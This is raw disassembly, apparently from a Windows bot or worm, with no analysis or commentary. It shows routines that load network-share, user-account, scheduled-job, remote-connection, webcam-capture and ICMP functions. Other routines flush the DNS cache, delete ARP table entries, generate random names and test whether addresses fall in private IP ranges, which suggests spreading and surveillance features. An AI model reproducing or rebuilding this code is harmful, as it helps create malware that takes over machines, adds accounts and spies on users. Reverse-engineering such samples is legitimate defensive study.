push offset aWininet_dll ; "wininet.dll"
call ebp ; sub_50AE83
mov edi, eax
cmp edi, ebx
jz loc_40A5F4
push offset aInternetgetcon ; "InternetGetConnectedState"
push edi
call esi ; sub_50B076
push offset aInternetgetc_0 ; "InternetGetConnectedStateEx"
push edi
mov ds:dword_4E2F04, eax
call esi ; sub_50B076
push offset aHttpopenreques ; "HttpOpenRequestA"
push edi
mov ds:dword_4E2E8C, eax
call esi ; sub_50B076
push offset aHttpsendreques ; "HttpSendRequestA"
push edi
mov ds:dword_4E2F90, eax
call esi ; sub_50B076
push offset aInternetconnec ; "InternetConnectA"
push edi
mov ds:dword_4E2F3C, eax
call esi ; sub_50B076
push offset aInternetopena ; "InternetOpenA"
push edi
mov ds:dword_4E2F9C, eax
call esi ; sub_50B076
push offset aInternetopenur ; "InternetOpenUrlA"
push edi
mov ds:dword_4E2F60, eax
call esi ; sub_50B076
push offset aInternetcracku ; "InternetCrackUrlA"
push edi
mov ds:dword_4E2ECC, eax
call esi ; sub_50B076
push offset aInternetreadfi ; "InternetReadFile"
push edi
mov ds:dword_4E2EC4, eax
call esi ; sub_50B076
push offset aInternetcloseh ; "InternetCloseHandle"
push edi
mov ds:dword_4E2ED4, eax
call esi ; sub_50B076
cmp ds:dword_4E2F04, ebx
mov ecx, ds:dword_4E2F60
mov ds:dword_4E2FFC, eax
jz short loc_40A5D0
cmp ds:dword_4E2E8C, ebx
jz short loc_40A5D0
cmp ds:dword_4E2F90, ebx
jz short loc_40A5D0
cmp ds:dword_4E2F3C, ebx
jz short loc_40A5D0
cmp ds:dword_4E2F9C, ebx
jz short loc_40A5D0
cmp ecx, ebx
jz short loc_40A5D0
cmp ds:dword_4E2ECC, ebx
jz short loc_40A5D0
cmp ds:dword_4E2EC4, ebx
jz short loc_40A5D0
cmp ds:dword_4E2ED4, ebx
jz short loc_40A5D0
cmp eax, ebx
jnz short loc_40A5DA
loc_40A5D0: ; CODE XREF: sub_409D10+87E�j
; sub_409D10+886�j ...
mov ds:dword_4E30AC, 1
loc_40A5DA: ; CODE XREF: sub_409D10+8BE�j
cmp ecx, ebx
jz short loc_40A60F
push ebx
push ebx
push ebx
push ebx
push offset aMozilla4_0Comp ; "Mozilla/4.0 (compatible)"
call ecx ; InternetOpenA
cmp eax, ebx
mov ds:dword_4E2F78, eax
jnz short loc_40A60F
jmp short loc_40A609
; ---------------------------------------------------------------------------
loc_40A5F4: ; CODE XREF: sub_409D10+7EA�j
call ds:dword_4F5360 ; RtlGetLastWin32Error
mov ds:dword_4E30B0, eax
mov ds:dword_4E30AC, 1
loc_40A609: ; CODE XREF: sub_409D10+8E2�j
mov ds:dword_4E2F78, ebx
loc_40A60F: ; CODE XREF: sub_409D10+8CC�j
; sub_409D10+8E0�j
push offset aIcmp_dll ; "icmp.dll"
call ebp ; sub_50AE83
mov edi, eax
cmp edi, ebx
jz short loc_40A659
push offset aIcmpcreatefile ; "IcmpCreateFile"
push edi
call esi ; sub_50B076
push offset aIcmpclosehandl ; "IcmpCloseHandle"
push edi
mov ds:dword_4E2F50, eax
call esi ; sub_50B076
push offset aIcmpsendecho ; "IcmpSendEcho"
push edi
mov ds:dword_4E307C, eax
call esi ; sub_50B076
cmp ds:dword_4E2F50, ebx
mov ds:dword_4E2EE0, eax
jz short loc_40A664
cmp ds:dword_4E307C, ebx
jz short loc_40A664
cmp eax, ebx
jnz short loc_40A66E
jmp short loc_40A664
; ---------------------------------------------------------------------------
loc_40A659: ; CODE XREF: sub_409D10+90A�j
call ds:dword_4F5360 ; RtlGetLastWin32Error
mov ds:dword_4E30B8, eax
loc_40A664: ; CODE XREF: sub_409D10+939�j
; sub_409D10+941�j ...
mov ds:dword_4E30B4, 1
loc_40A66E: ; CODE XREF: sub_409D10+945�j
push offset aNetapi32_dll ; "netapi32.dll"
call ebp ; sub_50AE83
mov edi, eax
cmp edi, ebx
jz loc_40A775
push offset aNetshareadd ; "NetShareAdd"
push edi
call esi ; sub_50B076
push offset aNetsharedel ; "NetShareDel"
push edi
mov ds:dword_4E2EBC, eax
call esi ; sub_50B076
push offset aNetshareenum ; "NetShareEnum"
push edi
mov ds:dword_4E2E94, eax
call esi ; sub_50B076
push offset aNetschedulejob ; "NetScheduleJobAdd"
push edi
mov ds:dword_4E2F0C, eax
call esi ; sub_50B076
push offset aNetapibufferfr ; "NetApiBufferFree"
push edi
mov ds:dword_4E2F40, eax
call esi ; sub_50B076
push offset aNetremotetod ; "NetRemoteTOD"
push edi
mov ds:dword_4E3058, eax
call esi ; sub_50B076
push offset aNetuseradd ; "NetUserAdd"
push edi
mov ds:dword_4E2EF4, eax
call esi ; sub_50B076
push offset aNetuserdel ; "NetUserDel"
push edi
mov ds:dword_4E2EA0, eax
call esi ; sub_50B076
push offset aNetuserenum ; "NetUserEnum"
push edi
mov ds:dword_4E2E90, eax
call esi ; sub_50B076
push offset aNetusergetinfo ; "NetUserGetInfo"
push edi
mov ds:dword_4E2F28, eax
call esi ; sub_50B076
push offset aNetmessagebuff ; "NetMessageBufferSend"
push edi
mov ds:dword_4E3020, eax
call esi ; sub_50B076
push offset aNetwkstagetinf ; "NetWkstaGetInfo"
push edi
mov ds:dword_4E2FD8, eax
call esi ; sub_50B076
cmp ds:dword_4E2EBC, ebx
mov ds:dword_4E2EFC, eax
jz short loc_40A780
cmp ds:dword_4E2E94, ebx
jz short loc_40A780
cmp ds:dword_4E2F0C, ebx
jz short loc_40A780
cmp ds:dword_4E2F40, ebx
jz short loc_40A780
cmp ds:dword_4E3058, ebx
jz short loc_40A780
cmp ds:dword_4E2EF4, ebx
jz short loc_40A780
cmp ds:dword_4E2EA0, ebx
jz short loc_40A780
cmp ds:dword_4E2E90, ebx
jz short loc_40A780
cmp ds:dword_4E2F28, ebx
jz short loc_40A780
cmp ds:dword_4E3020, ebx
jz short loc_40A780
cmp ds:dword_4E2FD8, ebx
jnz short loc_40A78A
jmp short loc_40A780
; ---------------------------------------------------------------------------
loc_40A775: ; CODE XREF: sub_409D10+969�j
call ds:dword_4F5360 ; RtlGetLastWin32Error
mov ds:dword_4E30C0, eax
loc_40A780: ; CODE XREF: sub_409D10+A11�j
; sub_409D10+A19�j ...
mov ds:dword_4E30BC, 1
loc_40A78A: ; CODE XREF: sub_409D10+A61�j
push offset aDnsapi_dll ; "dnsapi.dll"
call ebp ; sub_50AE83
mov edi, eax
cmp edi, ebx
jz short loc_40A7BF
push offset aDnsflushresolv ; "DnsFlushResolverCache"
push edi
call esi ; sub_50B076
push offset aDnsflushreso_0 ; "DnsFlushResolverCacheEntry_A"
push edi
mov ds:dword_4E2EE4, eax
call esi ; sub_50B076
cmp ds:dword_4E2EE4, ebx
mov ds:dword_4E2FC0, eax
jz short loc_40A7CA
cmp eax, ebx
jnz short loc_40A7D4
jmp short loc_40A7CA
; ---------------------------------------------------------------------------
loc_40A7BF: ; CODE XREF: sub_409D10+A85�j
call ds:dword_4F5360 ; RtlGetLastWin32Error
mov ds:dword_4E30C8, eax
loc_40A7CA: ; CODE XREF: sub_409D10+AA7�j
; sub_409D10+AAD�j
mov ds:dword_4E30C4, 1
loc_40A7D4: ; CODE XREF: sub_409D10+AAB�j
push offset aIphlpapi_dll ; "iphlpapi.dll"
call ebp ; sub_50AE83
mov edi, eax
cmp edi, ebx
jz short loc_40A809
push offset aGetipnettable ; "GetIpNetTable"
push edi
call esi ; sub_50B076
push offset aDeleteipnetent ; "DeleteIpNetEntry"
push edi
mov ds:dword_4E3044, eax
call esi ; sub_50B076
cmp ds:dword_4E3044, ebx
mov ds:dword_4E3040, eax
jz short loc_40A814
cmp eax, ebx
jnz short loc_40A81E
jmp short loc_40A814
; ---------------------------------------------------------------------------
loc_40A809: ; CODE XREF: sub_409D10+ACF�j
call ds:dword_4F5360 ; RtlGetLastWin32Error
mov ds:dword_4E30D0, eax
loc_40A814: ; CODE XREF: sub_409D10+AF1�j
; sub_409D10+AF7�j
mov ds:dword_4E30CC, 1
loc_40A81E: ; CODE XREF: sub_409D10+AF5�j
push offset aMpr_dll ; "mpr.dll"
call ebp ; sub_50AE83
mov edi, eax
cmp edi, ebx
jz short loc_40A87D
push offset aWnetaddconnect ; "WNetAddConnection2A"
push edi
call esi ; sub_50B076
push offset aWnetaddconne_0 ; "WNetAddConnection2W"
push edi
mov ds:dword_4E3070, eax
call esi ; sub_50B076
push offset aWnetcancelconn ; "WNetCancelConnection2A"
push edi
mov ds:dword_4E3068, eax
call esi ; sub_50B076
push offset aWnetcancelco_0 ; "WNetCancelConnection2W"
push edi
mov ds:dword_4E3030, eax
call esi ; sub_50B076
cmp ds:dword_4E3070, ebx
mov ds:dword_4E2F00, eax
jz short loc_40A888
cmp ds:dword_4E3068, ebx
jz short loc_40A888
cmp ds:dword_4E3030, ebx
jz short loc_40A888
cmp eax, ebx
jnz short loc_40A892
jmp short loc_40A888
; ---------------------------------------------------------------------------
loc_40A87D: ; CODE XREF: sub_409D10+B19�j
call ds:dword_4F5360 ; RtlGetLastWin32Error
mov ds:dword_4E30D8, eax
loc_40A888: ; CODE XREF: sub_409D10+B55�j
; sub_409D10+B5D�j ...
mov ds:dword_4E30D4, 1
loc_40A892: ; CODE XREF: sub_409D10+B69�j
push offset aShell32_dll ; "shell32.dll"
call ebp ; sub_50AE83
mov edi, eax
cmp edi, ebx
jz short loc_40A8C7
push offset aShellexecutea ; "ShellExecuteA"
push edi
call esi ; sub_50B076
push offset aShchangenotify ; "SHChangeNotify"
push edi
mov ds:dword_4E2F34, eax
call esi ; sub_50B076
cmp ds:dword_4E2F34, ebx
mov ds:dword_4E303C, eax
jz short loc_40A8D2
cmp eax, ebx
jnz short loc_40A8DC
jmp short loc_40A8D2
; ---------------------------------------------------------------------------
loc_40A8C7: ; CODE XREF: sub_409D10+B8D�j
call ds:dword_4F5360 ; RtlGetLastWin32Error
mov ds:dword_4E30E0, eax
loc_40A8D2: ; CODE XREF: sub_409D10+BAF�j
; sub_409D10+BB5�j
mov ds:dword_4E30DC, 1
loc_40A8DC: ; CODE XREF: sub_409D10+BB3�j
push offset aOdbc32_dll ; "odbc32.dll"
call ebp ; sub_50AE83
mov edi, eax
cmp edi, ebx
jz short loc_40A965
push offset aSqldriverconne ; "SQLDriverConnect"
push edi
call esi ; sub_50B076
push offset aSqlsetenvattr ; "SQLSetEnvAttr"
push edi
mov ds:dword_4E3004, eax
call esi ; sub_50B076
push offset aSqlexecdirect ; "SQLExecDirect"
push edi
mov ds:dword_4E3050, eax
call esi ; sub_50B076
push offset aSqlallochandle ; "SQLAllocHandle"
push edi
mov ds:dword_4E2F8C, eax
call esi ; sub_50B076
push offset aSqlfreehandle ; "SQLFreeHandle"
push edi
mov ds:dword_4E2F44, eax
call esi ; sub_50B076
push offset aSqldisconnect ; "SQLDisconnect"
push edi
mov ds:dword_4E2FE4, eax
call esi ; sub_50B076
cmp ds:dword_4E3004, ebx
mov ds:dword_4E2F54, eax
jz short loc_40A970
cmp ds:dword_4E3050, ebx
jz short loc_40A970
cmp ds:dword_4E2F8C, ebx
jz short loc_40A970
cmp ds:dword_4E2F44, ebx
jz short loc_40A970
cmp ds:dword_4E2FE4, ebx
jz short loc_40A970
cmp eax, ebx
jnz short loc_40A97A
jmp short loc_40A970
; ---------------------------------------------------------------------------
loc_40A965: ; CODE XREF: sub_409D10+BD7�j
call ds:dword_4F5360 ; RtlGetLastWin32Error
mov ds:dword_4E30E8, eax
loc_40A970: ; CODE XREF: sub_409D10+C2D�j
; sub_409D10+C35�j ...
mov ds:dword_4E30E4, 1
loc_40A97A: ; CODE XREF: sub_409D10+C51�j
push offset aAvicap32_dll ; "avicap32.dll"
call ebp ; sub_50AE83
mov edi, eax
cmp edi, ebx
jz short loc_40A9AF
push offset aCapcreatecaptu ; "capCreateCaptureWindowA"
push edi
call esi ; sub_50B076
push offset aCapgetdriverde ; "capGetDriverDescriptionA"
push edi
mov ds:dword_4E2F18, eax
call esi ; sub_50B076
cmp ds:dword_4E2F18, ebx
mov ds:dword_4E2FF8, eax
jz short loc_40A9BA
cmp eax, ebx
jnz short loc_40A9C4
jmp short loc_40A9BA
; ---------------------------------------------------------------------------
loc_40A9AF: ; CODE XREF: sub_409D10+C75�j
call ds:dword_4F5360 ; RtlGetLastWin32Error
mov ds:dword_4E30F0, eax
loc_40A9BA: ; CODE XREF: sub_409D10+C97�j
; sub_409D10+C9D�j
mov ds:dword_4E30EC, 1
loc_40A9C4: ; CODE XREF: sub_409D10+C9B�j
pop edi
xor eax, eax
pop esi
pop ebp
inc eax
pop ebx
retn
sub_409D10 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40A9CC proc near ; CODE XREF: sub_401C87+24F0�p
var_200 = byte ptr -200h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 200h
push ebx
mov ebx, [ebp+arg_4]
push esi
xor esi, esi
cmp ds:dword_4E3084, esi
push edi
mov edi, [ebp+arg_8]
jz short loc_40AA14
push ds:dword_4E3088
lea eax, [ebp+var_200]
push offset aKernel32_dllFa ; "Kernel32.dll failed. <%d>"
push eax
call sub_41EA60
push esi
lea eax, [ebp+var_200]
push edi
push eax
push ebx
push [ebp+arg_0]
call sub_409C75
add esp, 20h
loc_40AA14: ; CODE XREF: sub_40A9CC+1A�j
cmp ds:dword_4E308C, esi
jz short loc_40AA48
push ds:dword_4E3090
lea eax, [ebp+var_200]
push offset aUser32_dllFail ; "User32.dll failed. <%d>"
push eax
call sub_41EA60
push esi
lea eax, [ebp+var_200]
push edi
push eax
push ebx
push [ebp+arg_0]
call sub_409C75
add esp, 20h
loc_40AA48: ; CODE XREF: sub_40A9CC+4E�j
cmp ds:dword_4E3094, esi
jz short loc_40AA7C
push ds:dword_4E3098
lea eax, [ebp+var_200]
push offset aAdvapi32_dllFa ; "Advapi32.dll failed. <%d>"
push eax
call sub_41EA60
push esi
lea eax, [ebp+var_200]
push edi
push eax
push ebx
push [ebp+arg_0]
call sub_409C75
add esp, 20h
loc_40AA7C: ; CODE XREF: sub_40A9CC+82�j
cmp ds:dword_4E309C, esi
jz short loc_40AAB0
push ds:dword_4E30A0
lea eax, [ebp+var_200]
push offset aGdi32_dllFaile ; "Gdi32.dll failed. <%d>"
push eax
call sub_41EA60
push esi
lea eax, [ebp+var_200]
push edi
push eax
push ebx
push [ebp+arg_0]
call sub_409C75
add esp, 20h
loc_40AAB0: ; CODE XREF: sub_40A9CC+B6�j
cmp ds:dword_4E30A4, esi
jz short loc_40AAE4
push ds:dword_4E30A8
lea eax, [ebp+var_200]
push offset aWs2_32_dllFail ; "Ws2_32.dll failed. <%d>"
push eax
call sub_41EA60
push esi
lea eax, [ebp+var_200]
push edi
push eax
push ebx
push [ebp+arg_0]
call sub_409C75
add esp, 20h
loc_40AAE4: ; CODE XREF: sub_40A9CC+EA�j
cmp ds:dword_4E30AC, esi
jz short loc_40AB18
push ds:dword_4E30B0
lea eax, [ebp+var_200]
push offset aWininet_dllFai ; "Wininet.dll failed. <%d>"
push eax
call sub_41EA60
push esi
lea eax, [ebp+var_200]
push edi
push eax
push ebx
push [ebp+arg_0]
call sub_409C75
add esp, 20h
loc_40AB18: ; CODE XREF: sub_40A9CC+11E�j
cmp ds:dword_4E30B4, esi
jz short loc_40AB4C
push ds:dword_4E30B8
lea eax, [ebp+var_200]
push offset aIcmp_dllFailed ; "Icmp.dll failed. <%d>"
push eax
call sub_41EA60
push esi
lea eax, [ebp+var_200]
push edi
push eax
push ebx
push [ebp+arg_0]
call sub_409C75
add esp, 20h
loc_40AB4C: ; CODE XREF: sub_40A9CC+152�j
cmp ds:dword_4E30BC, esi
jz short loc_40AB80
push ds:dword_4E30C0
lea eax, [ebp+var_200]
push offset aNetapi32_dllFa ; "Netapi32.dll failed. <%d>"
push eax
call sub_41EA60
push esi
lea eax, [ebp+var_200]
push edi
push eax
push ebx
push [ebp+arg_0]
call sub_409C75
add esp, 20h
loc_40AB80: ; CODE XREF: sub_40A9CC+186�j
cmp ds:dword_4E30C4, esi
jz short loc_40ABB4
push ds:dword_4E30C8
lea eax, [ebp+var_200]
push offset aDnsapi_dllFail ; "Dnsapi.dll failed. <%d>"
push eax
call sub_41EA60
push esi
lea eax, [ebp+var_200]
push edi
push eax
push ebx
push [ebp+arg_0]
call sub_409C75
add esp, 20h
loc_40ABB4: ; CODE XREF: sub_40A9CC+1BA�j
cmp ds:dword_4E30CC, esi
jz short loc_40ABE8
push ds:dword_4E30D0
lea eax, [ebp+var_200]
push offset aIphlpapi_dllFa ; "Iphlpapi.dll failed. <%d>"
push eax
call sub_41EA60
push esi
lea eax, [ebp+var_200]
push edi
push eax
push ebx
push [ebp+arg_0]
call sub_409C75
add esp, 20h
loc_40ABE8: ; CODE XREF: sub_40A9CC+1EE�j
cmp ds:dword_4E30D4, esi
jz short loc_40AC1C
push ds:dword_4E30D8
lea eax, [ebp+var_200]
push offset aMpr32_dllFaile ; "Mpr32.dll failed. <%d>"
push eax
call sub_41EA60
push esi
lea eax, [ebp+var_200]
push edi
push eax
push ebx
push [ebp+arg_0]
call sub_409C75
add esp, 20h
loc_40AC1C: ; CODE XREF: sub_40A9CC+222�j
cmp ds:dword_4E30DC, esi
jz short loc_40AC50
push ds:dword_4E30E0
lea eax, [ebp+var_200]
push offset aShell32_dllFai ; "Shell32.dll failed. <%d>"
push eax
call sub_41EA60
push esi
lea eax, [ebp+var_200]
push edi
push eax
push ebx
push [ebp+arg_0]
call sub_409C75
add esp, 20h
loc_40AC50: ; CODE XREF: sub_40A9CC+256�j
cmp ds:dword_4E30E4, esi
jz short loc_40AC84
push ds:dword_4E30E8
lea eax, [ebp+var_200]
push offset aOdbc32_dllFail ; "Odbc32.dll failed. <%d>"
push eax
call sub_41EA60
push esi
lea eax, [ebp+var_200]
push edi
push eax
push ebx
push [ebp+arg_0]
call sub_409C75
add esp, 20h
loc_40AC84: ; CODE XREF: sub_40A9CC+28A�j
cmp ds:dword_4E30EC, esi
jz short loc_40ACB8
push ds:dword_4E30F0
lea eax, [ebp+var_200]
push offset aAvicap32_dllFa ; "Avicap32.dll failed. <%d>"
push eax
call sub_41EA60
push esi
lea eax, [ebp+var_200]
push edi
push eax
push ebx
push [ebp+arg_0]
call sub_409C75
add esp, 20h
loc_40ACB8: ; CODE XREF: sub_40A9CC+2BE�j
lea eax, [ebp+var_200]
push offset unk_4441FC
push eax
call sub_41EA60
cmp [ebp+arg_C], esi
pop ecx
pop ecx
jnz short loc_40ACE5
push esi
lea eax, [ebp+var_200]
push edi
push eax
push ebx
push [ebp+arg_0]
call sub_409C75
add esp, 14h
loc_40ACE5: ; CODE XREF: sub_40A9CC+302�j
lea eax, [ebp+var_200]
push eax
call sub_415A3C
pop ecx
pop edi
pop esi
pop ebx
leave
retn
sub_40A9CC endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 20h
cmp dword ptr [ebp+8], 0
push esi
jz loc_40AD8C
push offset dword_4E3104
push dword ptr [ebp+8]
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jz short loc_40AD8C
push 20h
lea eax, [ebp-20h]
push dword ptr [ebp+8]
push eax
call sub_41E510
lea eax, [ebp-20h]
push offset a___1 ; ".."
push eax
call sub_41F870
add esp, 14h
test eax, eax
jz short loc_40AD8C
push eax
call sub_41E710
mov dword ptr [esp], (offset a___1+2)
push 0
mov esi, eax
call sub_41F870
pop ecx
test eax, eax
pop ecx
jz short loc_40AD8C
push eax
call sub_41E710
cmp esi, 0Ah
pop ecx
jz short loc_40AD87
cmp esi, 0ACh
jnz short loc_40AD78
cmp eax, 0Fh
jle short loc_40AD8C
cmp eax, 20h
jl short loc_40AD87
loc_40AD78: ; CODE XREF: _0:0040AD6C�j
cmp esi, 0C0h
jnz short loc_40AD8C
cmp eax, 0A8h
jnz short loc_40AD8C
loc_40AD87: ; CODE XREF: _0:0040AD64�j _0:0040AD76�j
xor eax, eax
inc eax
jmp short loc_40AD8E
; ---------------------------------------------------------------------------
loc_40AD8C: ; CODE XREF: _0:0040AD02�j _0:0040AD19�j ...
xor eax, eax
loc_40AD8E: ; CODE XREF: _0:0040AD8A�j
pop esi
leave
retn
; =============== S U B R O U T I N E =======================================
sub_40AD91 proc near ; CODE XREF: sub_4019A5+4F�p
; sub_401C87+5D52�p ...
arg_0 = dword ptr 4
push [esp+arg_0]
call ds:dword_4E3008 ; inet_addr
cmp eax, 0FFFFFFFFh
jnz short locret_40ADB9
push [esp+arg_0]
call ds:dword_4E304C ; gethostbyname
test eax, eax
jnz short loc_40ADB2
or eax, 0FFFFFFFFh
retn
; ---------------------------------------------------------------------------
loc_40ADB2: ; CODE XREF: sub_40AD91+1B�j
mov eax, [eax+0Ch]
mov eax, [eax]
mov eax, [eax]
locret_40ADB9: ; CODE XREF: sub_40AD91+D�j
retn
sub_40AD91 endp
; =============== S U B R O U T I N E =======================================
sub_40ADBA proc near ; CODE XREF: sub_4019A5+D6�p
mov ecx, ds:dword_4E2EE4
xor eax, eax
test ecx, ecx
jz short locret_40ADC8
jmp ecx
; ---------------------------------------------------------------------------
locret_40ADC8: ; CODE XREF: sub_40ADBA+A�j
retn
sub_40ADBA endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40ADC9 proc near ; CODE XREF: sub_401C87:loc_4040CB�p
var_88 = byte ptr -88h
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 88h
push ebx
xor ebx, ebx
push esi
inc ebx
push edi
lea eax, [ebp+var_8]
xor edi, edi
push ebx
push eax
push edi
xor esi, esi
mov [ebp+var_8], edi
mov [ebp+var_4], ebx
call ds:dword_4E3044 ; GetIpNetTable
mov ecx, eax
sub ecx, edi
jz loc_40AE95
sub ecx, 32h
jz loc_40AE8E
sub ecx, 48h
jz short loc_40AE29
sub ecx, 6Eh
jz short loc_40AE22
push eax
push offset unk_444220
loc_40AE11: ; CODE XREF: sub_40ADC9+91�j
lea eax, [ebp+var_88]
push eax
call sub_41EA60
add esp, 0Ch
jmp short loc_40AE6F
; ---------------------------------------------------------------------------
loc_40AE22: ; CODE XREF: sub_40ADC9+40�j
push offset unk_44424C
jmp short loc_40AE61
; ---------------------------------------------------------------------------
loc_40AE29: ; CODE XREF: sub_40ADC9+3B�j
push [ebp+var_8]
call sub_41BE40
push [ebp+var_8]
mov esi, eax
push edi
push esi
call sub_41E4B0
add esp, 10h
cmp esi, edi
jz short loc_40AE5C
lea eax, [ebp+var_8]
push ebx
push eax
push esi
call ds:dword_4E3044 ; GetIpNetTable
cmp eax, edi
jz short loc_40AE95
push eax
push offset unk_444270
jmp short loc_40AE11
; ---------------------------------------------------------------------------
loc_40AE5C: ; CODE XREF: sub_40ADC9+79�j
push offset unk_44429C
loc_40AE61: ; CODE XREF: sub_40ADC9+5E�j
; sub_40ADC9+CA�j
lea eax, [ebp+var_88]
push eax
call sub_41EA60
pop ecx
pop ecx
loc_40AE6F: ; CODE XREF: sub_40ADC9+57�j
lea eax, [ebp+var_88]
mov [ebp+var_4], edi
push eax
call sub_415A3C
pop ecx
loc_40AE7F: ; CODE XREF: sub_40ADC9+CE�j
; sub_40ADC9+E2�j
push esi
call sub_41C9D0
mov eax, [ebp+var_4]
pop ecx
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_40AE8E: ; CODE XREF: sub_40ADC9+32�j
push offset unk_4442CC
jmp short loc_40AE61
; ---------------------------------------------------------------------------
loc_40AE95: ; CODE XREF: sub_40ADC9+29�j
; sub_40ADC9+89�j
cmp [esi], edi
jbe short loc_40AE7F
lea ebx, [esi+4]
loc_40AE9C: ; CODE XREF: sub_40ADC9+E0�j
push ebx
call ds:dword_4E3040 ; DeleteIpNetEntry
inc edi
add ebx, 18h
cmp edi, [esi]
jb short loc_40AE9C
jmp short loc_40AE7F
sub_40ADC9 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40AEAD proc near ; CODE XREF: sub_401C87+21EB�p
; sub_401C87+2322�p ...
var_14 = byte ptr -14h
var_10 = byte ptr -10h
var_F = byte ptr -0Fh
var_E = byte ptr -0Eh
var_D = byte ptr -0Dh
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 14h
push esi
push 10h
pop eax
mov [ebp+var_4], eax
push eax
lea eax, [ebp+var_14]
push 0
push eax
call sub_41E4B0
add esp, 0Ch
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+var_14]
push eax
push [ebp+arg_0]
call ds:dword_4E2F6C ; getsockname
movzx eax, [ebp+var_D]
push eax
mov esi, offset dword_4E30F4
movzx eax, [ebp+var_E]
push eax
movzx eax, [ebp+var_F]
push eax
movzx eax, [ebp+var_10]
push eax
push offset aD_D_D_D ; "%d.%d.%d.%d"
push esi
call sub_41EA60
add esp, 18h
mov eax, esi
pop esi
leave
retn
sub_40AEAD endp
; =============== S U B R O U T I N E =======================================
sub_40AF06 proc near ; CODE XREF: _0:0040C75B�p
; sub_4133AE+24C�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov ecx, [esp+arg_4]
xor edx, edx
cmp ecx, 1
push esi
jle short loc_40AF31
lea eax, [ecx-2]
push edi
shr eax, 1
inc eax
mov esi, eax
neg esi
lea ecx, [ecx+esi*2]
mov esi, [esp+8+arg_0]
loc_40AF24: ; CODE XREF: sub_40AF06+26�j
movzx edi, word ptr [esi]
add edx, edi
inc esi
inc esi
dec eax
jnz short loc_40AF24
pop edi
jmp short loc_40AF35
; ---------------------------------------------------------------------------
loc_40AF31: ; CODE XREF: sub_40AF06+A�j
mov esi, [esp+4+arg_0]
loc_40AF35: ; CODE XREF: sub_40AF06+29�j
test ecx, ecx
jz short loc_40AF3E
movzx eax, byte ptr [esi]
add edx, eax
loc_40AF3E: ; CODE XREF: sub_40AF06+31�j
mov ecx, edx
and edx, 0FFFFh
shr ecx, 10h
add ecx, edx
pop esi
mov eax, ecx
shr eax, 10h
add eax, ecx
not eax
retn
sub_40AF06 endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push ecx
mov ecx, [ebp+0Ch]
mov edx, [ebp+8]
push esi
xor esi, esi
cmp ecx, 1
mov [ebp-4], esi
jle short loc_40AF85
lea eax, [ecx-2]
push edi
shr eax, 1
inc eax
lea edi, [eax+eax]
sub ecx, edi
loc_40AF77: ; CODE XREF: _0:0040AF7F�j
movzx edi, word ptr [edx]
add esi, edi
inc edx
inc edx
dec eax
jnz short loc_40AF77
pop edi
cmp ecx, 1
loc_40AF85: ; CODE XREF: _0:0040AF69�j
jnz short loc_40AF92
mov al, [edx]
mov [ebp-4], al
movzx eax, word ptr [ebp-4]
add esi, eax
loc_40AF92: ; CODE XREF: _0:loc_40AF85�j
mov ecx, esi
and esi, 0FFFFh
sar ecx, 10h
add ecx, esi
pop esi
mov eax, ecx
sar eax, 10h
add eax, ecx
not eax
leave
retn
; =============== S U B R O U T I N E =======================================
sub_40AFAB proc near ; CODE XREF: sub_40B38F+4A�p
; DATA XREF: _2:off_444318�o
arg_0 = dword ptr 4
push esi
push edi
call ds:dword_4F537C ; GetTickCount
push eax
call sub_41EB60
call sub_41EB70
xor edx, edx
mov ecx, 48Fh
div ecx
mov edi, [esp+0Ch+arg_0]
push ds:off_446DB0[edx*4]
push offset dword_447FEC
push 1Ch
push edi
call sub_41EC30
xor esi, esi
add esp, 14h
cmp ds:dword_43F09C, esi
jle short loc_40B012
loc_40AFEC: ; CODE XREF: sub_40AFAB+65�j
call sub_41EB70
push 0Ah
cdq
pop ecx
idiv ecx
push edx
push edi
push offset dword_447FF0
push 1Ch
push edi
call sub_41EC30
add esp, 14h
inc esi
cmp esi, ds:dword_43F09C
jl short loc_40AFEC
loc_40B012: ; CODE XREF: sub_40AFAB+3F�j
mov eax, edi
pop edi
pop esi
retn
sub_40AFAB endp
; ---------------------------------------------------------------------------
push esi
push edi
call ds:dword_4F537C ; GetTickCount
push eax
call sub_41EB60
mov edi, [esp+10h]
mov dword ptr [esp], offset asc_43F12A ; "-"
push offset dword_447FF8
push 1Ch
push edi
call sub_41EC30
xor esi, esi
add esp, 10h
cmp ds:dword_43F09C, esi
jle short loc_40B070
loc_40B04A: ; CODE XREF: _0:0040B06E�j
call sub_41EB70
push 0Ah
cdq
pop ecx
idiv ecx
push edx
push edi
push offset dword_447FFC
push 1Ch
push edi
call sub_41EC30
add esp, 14h
inc esi
cmp esi, ds:dword_43F09C
jl short loc_40B04A
loc_40B070: ; CODE XREF: _0:0040B048�j
mov eax, edi
pop edi
pop esi
retn
; =============== S U B R O U T I N E =======================================
sub_40B075 proc near ; CODE XREF: sub_401C87+6A68�p
arg_0 = dword ptr 4
push ebx
push esi
push edi
call ds:dword_4F537C ; GetTickCount
push eax
call sub_41EB60
pop ecx
call sub_41EB70
push 3
mov ebx, [esp+10h+arg_0]
cdq
pop ecx
xor edi, edi
idiv ecx
mov esi, edx
add esi, ds:dword_43F09C
test esi, esi
jle short loc_40B0B8
loc_40B0A2: ; CODE XREF: sub_40B075+41�j
call sub_41EB70
push 1Ah
cdq
pop ecx
idiv ecx
add dl, 61h
mov [edi+ebx], dl
inc edi
cmp edi, esi
jl short loc_40B0A2
loc_40B0B8: ; CODE XREF: sub_40B075+2B�j
and byte ptr [edi+ebx], 0
pop edi
mov eax, ebx
pop esi
pop ebx
retn
sub_40B075 endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push ecx
push esi
push edi
mov esi, offset dword_448004
mov dword ptr [ebp-4], 100h
xor edi, edi
call ds:dword_4F537C ; GetTickCount
push eax
call sub_41EB60
pop ecx
